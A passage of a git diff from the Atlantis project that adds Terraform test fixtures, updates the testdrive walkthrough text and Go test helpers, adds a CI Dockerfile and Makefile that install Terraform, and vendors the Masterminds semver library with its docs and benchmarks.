+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: default.tfstate
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..e0d34d0905
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: staging.tfstate
+
+Outputs:
+
+var = staging
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..20a4e02fb2
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
@@ -0,0 +1,53 @@
+Ran Plan for 2 projects:
+1. workspace: `default` dir: `.`
+1. workspace: `default` dir: `.`
+
+### 1. workspace: `default` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+workspace=default
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `default` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..70df2f2518
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/main.tf b/server/testfixtures/test-repos/tfvars-yaml/main.tf
new file mode 100644
index 0000000000..d4d77ff4e7
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/main.tf
@@ -0,0 +1,19 @@
+terraform {
+ backend "local" {
+ }
+}
+
+resource "null_resource" "simple" {
+ count = 1
+}
+
+variable "var" {
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
new file mode 100644
index 0000000000..e8133a2b59
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
@@ -0,0 +1 @@
+path = "staging.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars
new file mode 100644
index 0000000000..34f4bbb990
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars
@@ -0,0 +1 @@
+var = "staging"
\ No newline at end of file
diff --git a/testdrive/testdrive.go b/testdrive/testdrive.go
index 368eb8db2a..a0de2c65d6 100644
--- a/testdrive/testdrive.go
+++ b/testdrive/testdrive.go
@@ -47,11 +47,40 @@ This mode sets up Atlantis on a test repo so you can try it out. We will
[bold]Press Ctrl-c at any time to exit
`
-var pullRequestBody = "In this pull request we will learn how to use atlantis. There are various commands that are available to you:\n" +
- "* Start by typing `atlantis help` in the comments.\n" +
- "* Next, lets plan by typing `atlantis plan` in the comments. That will run a `terraform plan`.\n" +
- "* Now lets apply that plan. Type `atlantis apply` in the comments. This will run a `terraform apply`.\n" +
- "\nThank you for trying out atlantis. For more info on running atlantis in production see https://github.com/runatlantis/atlantis"
+var pullRequestBody = strings.Replace(`
+In this pull request we will learn how to use Atlantis.
+
+1. In a couple of seconds you should see the output of Atlantis automatically running $terraform plan$.
+
+1. You can manually run $plan$ by typing a comment:
+
+ $$$
+ atlantis plan
+ $$$
+ Usually you'll let Atlantis automatically run plan for you though.
+
+1. To see all the comment commands available, type:
+ $$$
+ atlantis help
+ $$$
+
+1. To see the help for a specific command, for example $atlantis plan$, type:
+ $$$
+ atlantis plan --help
+ $$$
+
+1. Atlantis holds a "Lock" on this directory to prevent other pull requests modifying
+ the Terraform state until this pull request is merged. To view the lock, go to the Atlantis UI: [http://localhost:4141](http://localhost:4141).
+ If you weren't ready to apply, you could manually delete the plan and lock from the UI. Instead, we will apply it!
+
+1. To $terraform apply$ this change (which does nothing because it is creating a $null_resource$), type:
+ $$$
+ atlantis apply
+ $$$
+
+1. Finally, merge the pull request to unlock this directory.
+
+Thank you for trying out Atlantis! Next, try using Atlantis on your own repositories: [www.runatlantis.io/guide/getting-started.html](https://www.runatlantis.io/guide/getting-started.html).`, "$", "`", -1)
// Start begins the testdrive process.
// nolint: errcheck
diff --git a/testing/Dockerfile b/testing/Dockerfile
new file mode 100644
index 0000000000..b52eb89868
--- /dev/null
+++ b/testing/Dockerfile
@@ -0,0 +1,12 @@
+# This Dockerfile builds the Docker image used for running CircleCI tests.
+# Our full test suite needs Terraform installed, so the image installs it.
+# The image is updated by running `make build-testing-image`.
+FROM circleci/golang:1.10
+
+# Install Terraform
+ENV TERRAFORM_VERSION=0.11.7
+RUN curl -LOks https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \
+ sudo mkdir -p /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \
+ sudo unzip terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \
+ sudo ln -s /usr/local/bin/tf/versions/${TERRAFORM_VERSION}/terraform /usr/local/bin/terraform && \
+ rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip
diff --git a/testing/Makefile b/testing/Makefile
new file mode 100644
index 0000000000..49a5387eca
--- /dev/null
+++ b/testing/Makefile
@@ -0,0 +1,11 @@
+TEST_IMAGE_NAME := runatlantis/testing-env
+
+.DEFAULT_GOAL := help
+help: ## List targets & descriptions
+ @cat Makefile* | grep -E '^[a-zA-Z_-]+:.*?## .*$$' | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}'
+
+build-testing-image: ## Build and push the testing image
+ docker build -t $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) .
+ docker tag $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) $(TEST_IMAGE_NAME):latest
+ docker push $(TEST_IMAGE_NAME):$$(git rev-parse HEAD)
+ docker push $(TEST_IMAGE_NAME):latest
diff --git a/testing/assertions.go b/testing/assertions.go
index cd5bf3ba5b..d66266824e 100644
--- a/testing/assertions.go
+++ b/testing/assertions.go
@@ -16,9 +16,12 @@ package testing
import (
"fmt"
"path/filepath"
- "reflect"
"runtime"
+ "strings"
"testing"
+
+ "github.com/davecgh/go-spew/spew"
+ "github.com/go-test/deep"
)
// Assert fails the test if the condition is false.
@@ -44,10 +47,10 @@ func Ok(tb testing.TB, err error) {
// Equals fails the test if exp is not equal to act.
// Taken from https://github.com/benbjohnson/testing.
func Equals(tb testing.TB, exp, act interface{}) {
- if !reflect.DeepEqual(exp, act) {
+ tb.Helper()
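+ // deep.Equal returns a list of human-readable differences, or nil when equal.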
+ if diff := deep.Equal(exp, act); diff != nil {
_, file, line, _ := runtime.Caller(1)
- fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act)
- tb.FailNow()
+ tb.Fatalf("\033[31m%s:%d: %s\n\nexp: %s******\ngot: %s\033[39m\n", filepath.Base(file), line, diff, spew.Sdump(exp), spew.Sdump(act))
}
}
@@ -55,10 +58,22 @@ func Equals(tb testing.TB, exp, act interface{}) {
func ErrEquals(tb testing.TB, exp string, act error) {
tb.Helper()
if act == nil {
- tb.Errorf("exp err %q but err was nil", exp)
+ tb.Fatalf("exp err %q but err was nil\n", exp)
}
if act.Error() != exp {
- tb.Errorf("exp err: %q but got: %q", exp, act.Error())
+ tb.Fatalf("exp err: %q but got: %q\n", exp, act.Error())
+ }
+}
+
+// ErrContains fails the test if act is nil or act.Error() does not contain
+// substr.
+func ErrContains(tb testing.TB, substr string, act error) {
+ tb.Helper()
+ if act == nil {
+ tb.Fatalf("exp err to contain %q but err was nil", substr)
+ }
+ if !strings.Contains(act.Error(), substr) {
+ tb.Fatalf("exp err %q to contain %q", act.Error(), substr)
}
}
diff --git a/testing/temp_files.go b/testing/temp_files.go
new file mode 100644
index 0000000000..7a242010f2
--- /dev/null
+++ b/testing/temp_files.go
@@ -0,0 +1,43 @@
+package testing
+
+import (
+ "io/ioutil"
+ "os"
+ "path/filepath"
+ "testing"
+)
+
+// TempDir creates a temporary directory and returns its path along
+// with a cleanup function to be called via defer, ex:
+// dir, cleanup := TempDir(t)
+// defer cleanup()
+func TempDir(t *testing.T) (string, func()) {
+ tmpDir, err := ioutil.TempDir("", "")
+ Ok(t, err)
+ return tmpDir, func() {
+ os.RemoveAll(tmpDir) // nolint: errcheck
+ }
+}
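+
+// DirStructure creates a directory structure in a temp dir from the given map,
+// where a nil value means the key is an empty file and a nested
+// map[string]interface{} means the key is a subdirectory. It returns the root
+// dir and a cleanup function to be called via defer, ex:
+//   dir, cleanup := DirStructure(t, map[string]interface{}{
+//       "main.tf": nil,
+//       "staging": map[string]interface{}{"main.tf": nil},
+//   })
+//   defer cleanup()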
+func DirStructure(t *testing.T, structure map[string]interface{}) (string, func()) {
+ tmpDir, cleanup := TempDir(t)
+ dirStructureGo(t, tmpDir, structure)
+ return tmpDir, cleanup
+}
+
+func dirStructureGo(t *testing.T, parentDir string, structure map[string]interface{}) {
+ for key, val := range structure {
+ // If val is nil then key is a filename and we just create it
+ if val == nil {
+ _, err := os.Create(filepath.Join(parentDir, key))
+ Ok(t, err)
+ continue
+ }
+ // If val is another map then key is a dir
+ if dirContents, ok := val.(map[string]interface{}); ok {
+ subDir := filepath.Join(parentDir, key)
+ Ok(t, os.Mkdir(subDir, 0700))
+ // Recurse and create contents.
+ dirStructureGo(t, subDir, dirContents)
+ }
+ }
+}
diff --git a/vendor/github.com/Masterminds/semver/.travis.yml b/vendor/github.com/Masterminds/semver/.travis.yml
new file mode 100644
index 0000000000..3d9ebadb93
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/.travis.yml
@@ -0,0 +1,27 @@
+language: go
+
+go:
+ - 1.6.x
+ - 1.7.x
+ - 1.8.x
+ - 1.9.x
+ - 1.10.x
+ - tip
+
+# Setting sudo access to false will let Travis CI use containers rather than
+# VMs to run the tests. For more details see:
+# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/
+# - http://docs.travis-ci.com/user/workers/standard-infrastructure/
+sudo: false
+
+script:
+ - make setup
+ - make test
+
+notifications:
+ webhooks:
+ urls:
+ - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+ on_success: change # options: [always|never|change] default: always
+ on_failure: always # options: [always|never|change] default: always
+ on_start: never # options: [always|never|change] default: always
diff --git a/vendor/github.com/Masterminds/semver/CHANGELOG.md b/vendor/github.com/Masterminds/semver/CHANGELOG.md
new file mode 100644
index 0000000000..b888e20aba
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/CHANGELOG.md
@@ -0,0 +1,86 @@
+# 1.4.2 (2018-04-10)
+
+## Changed
+- #72: Updated the docs to point to vert for a console application
+- #71: Update the docs on pre-release comparator handling
+
+## Fixed
+- #70: Fix the handling of pre-releases and the 0.0.0 release edge case
+
+# 1.4.1 (2018-04-02)
+
+## Fixed
+- Fixed #64: Fix pre-release precedence issue (thanks @uudashr)
+
+# 1.4.0 (2017-10-04)
+
+## Changed
+- #61: Update NewVersion to parse ints with a 64bit int size (thanks @zknill)
+
+# 1.3.1 (2017-07-10)
+
+## Fixed
+- Fixed #57: number comparisons in prerelease sometimes inaccurate
+
+# 1.3.0 (2017-05-02)
+
+## Added
+- #45: Added json (un)marshaling support (thanks @mh-cbon)
+- Stability marker. See https://masterminds.github.io/stability/
+
+## Fixed
+- #51: Fix handling of single digit tilde constraint (thanks @dgodd)
+
+## Changed
+- #55: The godoc icon moved from png to svg
+
+# 1.2.3 (2017-04-03)
+
+## Fixed
+- #46: Fixed 0.x.x and 0.0.x in constraints being treated as *
+
+# Release 1.2.2 (2016-12-13)
+
+## Fixed
+- #34: Fixed issue where hyphen range was not working with pre-release parsing.
+
+# Release 1.2.1 (2016-11-28)
+
+## Fixed
+- #24: Fixed edge case issue where constraint "> 0" does not handle "0.0.1-alpha"
+ properly.
+
+# Release 1.2.0 (2016-11-04)
+
+## Added
+- #20: Added MustParse function for versions (thanks @adamreese)
+- #15: Added increment methods on versions (thanks @mh-cbon)
+
+## Fixed
+- Issue #21: Per the SemVer spec (section 9) a pre-release is unstable and
+ might not satisfy the intended compatibility. The change here ignores pre-releases
+ on constraint checks (e.g., ~ or ^) when a pre-release is not part of the
+ constraint. For example, `^1.2.3` will ignore pre-releases while
+ `^1.2.3-alpha` will include them.
+
+# Release 1.1.1 (2016-06-30)
+
+## Changed
+- Issue #9: Speed up version comparison performance (thanks @sdboyer)
+- Issue #8: Added benchmarks (thanks @sdboyer)
+- Updated Go Report Card URL to new location
+- Updated Readme to add code snippet formatting (thanks @mh-cbon)
+- Updating tagging to v[SemVer] structure for compatibility with other tools.
+
+# Release 1.1.0 (2016-03-11)
+
+- Issue #2: Implemented validation to provide reasons a versions failed a
+ constraint.
+
+# Release 1.0.1 (2015-12-31)
+
+- Fixed #1: * constraint failing on valid versions.
+
+# Release 1.0.0 (2015-10-20)
+
+- Initial release
diff --git a/vendor/github.com/Masterminds/semver/LICENSE.txt b/vendor/github.com/Masterminds/semver/LICENSE.txt
new file mode 100644
index 0000000000..0da4aeadb0
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/LICENSE.txt
@@ -0,0 +1,20 @@
+The Masterminds
+Copyright (C) 2014-2015, Matt Butcher and Matt Farina
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Masterminds/semver/Makefile b/vendor/github.com/Masterminds/semver/Makefile
new file mode 100644
index 0000000000..a7a1b4e36d
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/Makefile
@@ -0,0 +1,36 @@
+.PHONY: setup
+setup:
+ go get -u gopkg.in/alecthomas/gometalinter.v1
+ gometalinter.v1 --install
+
+.PHONY: test
+test: validate lint
+ @echo "==> Running tests"
+ go test -v
+
+.PHONY: validate
+validate:
+ @echo "==> Running static validations"
+ @gometalinter.v1 \
+ --disable-all \
+ --enable deadcode \
+ --severity deadcode:error \
+ --enable gofmt \
+ --enable gosimple \
+ --enable ineffassign \
+ --enable misspell \
+ --enable vet \
+ --tests \
+ --vendor \
+ --deadline 60s \
+ ./... || exit_code=1
+
+.PHONY: lint
+lint:
+ @echo "==> Running linters"
+ @gometalinter.v1 \
+ --disable-all \
+ --enable golint \
+ --vendor \
+ --deadline 60s \
+ ./... || :
diff --git a/vendor/github.com/Masterminds/semver/README.md b/vendor/github.com/Masterminds/semver/README.md
new file mode 100644
index 0000000000..3e934ed71e
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/README.md
@@ -0,0 +1,165 @@
+# SemVer
+
+The `semver` package provides the ability to work with [Semantic Versions](http://semver.org) in Go. Specifically it provides the ability to:
+
+* Parse semantic versions
+* Sort semantic versions
+* Check if a semantic version fits within a set of constraints
+* Optionally work with a `v` prefix
+
+[![Stability:
+Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html)
+[![Build Status](https://travis-ci.org/Masterminds/semver.svg)](https://travis-ci.org/Masterminds/semver) [![Build status](https://ci.appveyor.com/api/projects/status/jfk66lib7hb985k8/branch/master?svg=true&passingText=windows%20build%20passing&failingText=windows%20build%20failing)](https://ci.appveyor.com/project/mattfarina/semver/branch/master) [![GoDoc](https://godoc.org/github.com/Masterminds/semver?status.svg)](https://godoc.org/github.com/Masterminds/semver) [![Go Report Card](https://goreportcard.com/badge/github.com/Masterminds/semver)](https://goreportcard.com/report/github.com/Masterminds/semver)
+
+## Parsing Semantic Versions
+
+To parse a semantic version use the `NewVersion` function. For example,
+
+```go
+ v, err := semver.NewVersion("1.2.3-beta.1+build345")
+```
+
+If there is an error, the version wasn't parseable. The version object has methods
+to get the parts of the version, compare it to other versions, convert the
+version back into a string, and get the original string. For more details
+please see the [documentation](https://godoc.org/github.com/Masterminds/semver).
+
+## Sorting Semantic Versions
+
+A set of versions can be sorted using the [`sort`](https://golang.org/pkg/sort/)
+package from the standard library. For example,
+
+```go
+ raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",}
+ vs := make([]*semver.Version, len(raw))
+ for i, r := range raw {
+ v, err := semver.NewVersion(r)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ vs[i] = v
+ }
+
+ sort.Sort(semver.Collection(vs))
+```
+
+## Checking Version Constraints
+
+Checking a version against version constraints is one of the most featureful
+parts of the package.
+
+```go
+ c, err := semver.NewConstraint(">= 1.2.3")
+ if err != nil {
+ // Handle constraint not being parseable.
+ }
+
+ v, _ := semver.NewVersion("1.3")
+ if err != nil {
+ // Handle version not being parseable.
+ }
+ // Check if the version meets the constraints. The a variable will be true.
+ a := c.Check(v)
+```
+
+## Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma-separated AND comparisons. These are then joined by || into OR
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+* `=`: equal (aliased to no operator)
+* `!=`: not equal
+* `>`: greater than
+* `<`: less than
+* `>=`: greater than or equal to
+* `<=`: less than or equal to
+
+_Note, according to the Semantic Version specification pre-releases may not be
+API compliant with their release counterpart. It says,_
+
+> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._
+
+_SemVer comparisons without a pre-release value will skip pre-release versions.
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
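+As a minimal sketch of these operators in use (error handling elided, as in
+the earlier examples):
+
+```go
+    c, _ := semver.NewConstraint(">= 1.2, < 3.0.0 || >= 4.2.3")
+    v, _ := semver.NewVersion("1.3")
+    a := c.Check(v) // true: 1.3 satisfies the first || branch
+```
+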
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphen ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
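+A hyphen range behaves exactly like its rewritten form, for example (sketch):
+
+```go
+    c, _ := semver.NewConstraint("1.2 - 1.4.5") // rewritten to ">= 1.2, <= 1.4.5"
+    v, _ := semver.NewVersion("1.3")
+    a := c.Check(v) // true
+```
+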
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as wildcard characters. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the patch level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `< 3`
+* `*` is equivalent to `>= 0.0.0`
+
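+For instance, `1.2.x` accepts any patch release of 1.2 (sketch):
+
+```go
+    c, _ := semver.NewConstraint("1.2.x")
+    v, _ := semver.NewVersion("1.2.7")
+    a := c.Check(v) // true: 1.2.7 is >= 1.2.0 and < 1.3.0
+```
+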
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+for comparing API versions, as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
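+A short sketch contrasting caret with the tilde operator above: a tilde
+constraint pins the minor version while a caret constraint pins only the major
+version.
+
+```go
+    tilde, _ := semver.NewConstraint("~1.2.3")
+    caret, _ := semver.NewConstraint("^1.2.3")
+    v, _ := semver.NewVersion("1.3.0")
+    a := tilde.Check(v) // false: 1.3.0 is outside >= 1.2.3, < 1.3.0
+    b := caret.Check(v) // true: 1.3.0 is within >= 1.2.3, < 2.0.0
+```
+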
+# Validation
+
+In addition to testing a version against a constraint, a version can be validated
+against a constraint. When validation fails a slice of errors containing why a
+version didn't meet the constraint is returned. For example,
+
+```go
+ c, err := semver.NewConstraint("<= 1.2.3, >= 1.4")
+ if err != nil {
+ // Handle constraint not being parseable.
+ }
+
+ v, _ := semver.NewVersion("1.3")
+ if err != nil {
+ // Handle version not being parseable.
+ }
+
+ // Validate a version against a constraint.
+ a, msgs := c.Validate(v)
+ // a is false
+ for _, m := range msgs {
+ fmt.Println(m)
+
+ // Loops over the errors which would read
+ // "1.3 is greater than 1.2.3"
+ // "1.3 is less than 1.4"
+ }
+```
+
+# Contribute
+
+If you find an issue or want to contribute please file an [issue](https://github.com/Masterminds/semver/issues)
+or [create a pull request](https://github.com/Masterminds/semver/pulls).
diff --git a/vendor/github.com/Masterminds/semver/appveyor.yml b/vendor/github.com/Masterminds/semver/appveyor.yml
new file mode 100644
index 0000000000..b2778df15a
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/appveyor.yml
@@ -0,0 +1,44 @@
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\semver
+shallow_clone: true
+
+environment:
+ GOPATH: C:\gopath
+
+platform:
+ - x64
+
+install:
+ - go version
+ - go env
+ - go get -u gopkg.in/alecthomas/gometalinter.v1
+ - set PATH=%PATH%;%GOPATH%\bin
+ - gometalinter.v1.exe --install
+
+build_script:
+ - go install -v ./...
+
+test_script:
+ - "gometalinter.v1 \
+ --disable-all \
+ --enable deadcode \
+ --severity deadcode:error \
+ --enable gofmt \
+ --enable gosimple \
+ --enable ineffassign \
+ --enable misspell \
+ --enable vet \
+ --tests \
+ --vendor \
+ --deadline 60s \
+ ./... || exit_code=1"
+ - "gometalinter.v1 \
+ --disable-all \
+ --enable golint \
+ --vendor \
+ --deadline 60s \
+ ./... || :"
+ - go test -v
+
+deploy: off
diff --git a/vendor/github.com/Masterminds/semver/benchmark_test.go b/vendor/github.com/Masterminds/semver/benchmark_test.go
new file mode 100644
index 0000000000..58a5c289f4
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/benchmark_test.go
@@ -0,0 +1,157 @@
+package semver_test
+
+import (
+ "testing"
+
+ "github.com/Masterminds/semver"
+)
+
+/* Constraint creation benchmarks */
+
+func benchNewConstraint(c string, b *testing.B) {
+ for i := 0; i < b.N; i++ {
+ semver.NewConstraint(c)
+ }
+}
+
+func BenchmarkNewConstraintUnary(b *testing.B) {
+ benchNewConstraint("=2.0", b)
+}
+
+func BenchmarkNewConstraintTilde(b *testing.B) {
+ benchNewConstraint("~2.0.0", b)
+}
+
+func BenchmarkNewConstraintCaret(b *testing.B) {
+ benchNewConstraint("^2.0.0", b)
+}
+
+func BenchmarkNewConstraintWildcard(b *testing.B) {
+ benchNewConstraint("1.x", b)
+}
+
+func BenchmarkNewConstraintRange(b *testing.B) {
+ benchNewConstraint(">=2.1.x, <3.1.0", b)
+}
+
+func BenchmarkNewConstraintUnion(b *testing.B) {
+ benchNewConstraint("~2.0.0 || =3.1.0", b)
+}
+
+/* Check benchmarks */
+
+func benchCheckVersion(c, v string, b *testing.B) {
+ version, _ := semver.NewVersion(v)
+ constraint, _ := semver.NewConstraint(c)
+
+ for i := 0; i < b.N; i++ {
+ constraint.Check(version)
+ }
+}
+
+func BenchmarkCheckVersionUnary(b *testing.B) {
+ benchCheckVersion("=2.0", "2.0.0", b)
+}
+
+func BenchmarkCheckVersionTilde(b *testing.B) {
+ benchCheckVersion("~2.0.0", "2.0.5", b)
+}
+
+func BenchmarkCheckVersionCaret(b *testing.B) {
+ benchCheckVersion("^2.0.0", "2.1.0", b)
+}
+
+func BenchmarkCheckVersionWildcard(b *testing.B) {
+ benchCheckVersion("1.x", "1.4.0", b)
+}
+
+func BenchmarkCheckVersionRange(b *testing.B) {
+ benchCheckVersion(">=2.1.x, <3.1.0", "2.4.5", b)
+}
+
+func BenchmarkCheckVersionUnion(b *testing.B) {
+ benchCheckVersion("~2.0.0 || =3.1.0", "3.1.0", b)
+}
+
+func benchValidateVersion(c, v string, b *testing.B) {
+ version, _ := semver.NewVersion(v)
+ constraint, _ := semver.NewConstraint(c)
+
+ for i := 0; i < b.N; i++ {
+ constraint.Validate(version)
+ }
+}
+
+/* Validate benchmarks, including fails */
+
+func BenchmarkValidateVersionUnary(b *testing.B) {
+ benchValidateVersion("=2.0", "2.0.0", b)
+}
+
+func BenchmarkValidateVersionUnaryFail(b *testing.B) {
+ benchValidateVersion("=2.0", "2.0.1", b)
+}
+
+func BenchmarkValidateVersionTilde(b *testing.B) {
+ benchValidateVersion("~2.0.0", "2.0.5", b)
+}
+
+func BenchmarkValidateVersionTildeFail(b *testing.B) {
+ benchValidateVersion("~2.0.0", "1.0.5", b)
+}
+
+func BenchmarkValidateVersionCaret(b *testing.B) {
+ benchValidateVersion("^2.0.0", "2.1.0", b)
+}
+
+func BenchmarkValidateVersionCaretFail(b *testing.B) {
+ benchValidateVersion("^2.0.0", "4.1.0", b)
+}
+
+func BenchmarkValidateVersionWildcard(b *testing.B) {
+ benchValidateVersion("1.x", "1.4.0", b)
+}
+
+func BenchmarkValidateVersionWildcardFail(b *testing.B) {
+ benchValidateVersion("1.x", "2.4.0", b)
+}
+
+func BenchmarkValidateVersionRange(b *testing.B) {
+ benchValidateVersion(">=2.1.x, <3.1.0", "2.4.5", b)
+}
+
+func BenchmarkValidateVersionRangeFail(b *testing.B) {
+ benchValidateVersion(">=2.1.x, <3.1.0", "1.4.5", b)
+}
+
+func BenchmarkValidateVersionUnion(b *testing.B) {
+ benchValidateVersion("~2.0.0 || =3.1.0", "3.1.0", b)
+}
+
+func BenchmarkValidateVersionUnionFail(b *testing.B) {
+ benchValidateVersion("~2.0.0 || =3.1.0", "3.1.1", b)
+}
+
+/* Version creation benchmarks */
+
+func benchNewVersion(v string, b *testing.B) {
+ for i := 0; i < b.N; i++ {
+ semver.NewVersion(v)
+ }
+}
+
+func BenchmarkNewVersionSimple(b *testing.B) {
+ benchNewVersion("1.0.0", b)
+}
+
+func BenchmarkNewVersionPre(b *testing.B) {
+ benchNewVersion("1.0.0-alpha", b)
+}
+
+func BenchmarkNewVersionMeta(b *testing.B) {
+ benchNewVersion("1.0.0+metadata", b)
+}
+
+func BenchmarkNewVersionMetaDash(b *testing.B) {
+ benchNewVersion("1.0.0+metadata-dash", b)
+}
diff --git a/vendor/github.com/Masterminds/semver/collection.go b/vendor/github.com/Masterminds/semver/collection.go
new file mode 100644
index 0000000000..a78235895f
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/collection.go
@@ -0,0 +1,24 @@
+package semver
+
+// Collection is a collection of Version instances and implements the sort
+// interface. See the sort package for more details.
+// https://golang.org/pkg/sort/
+type Collection []*Version
+
+// Len returns the length of a collection: the number of Version instances
+// in the slice.
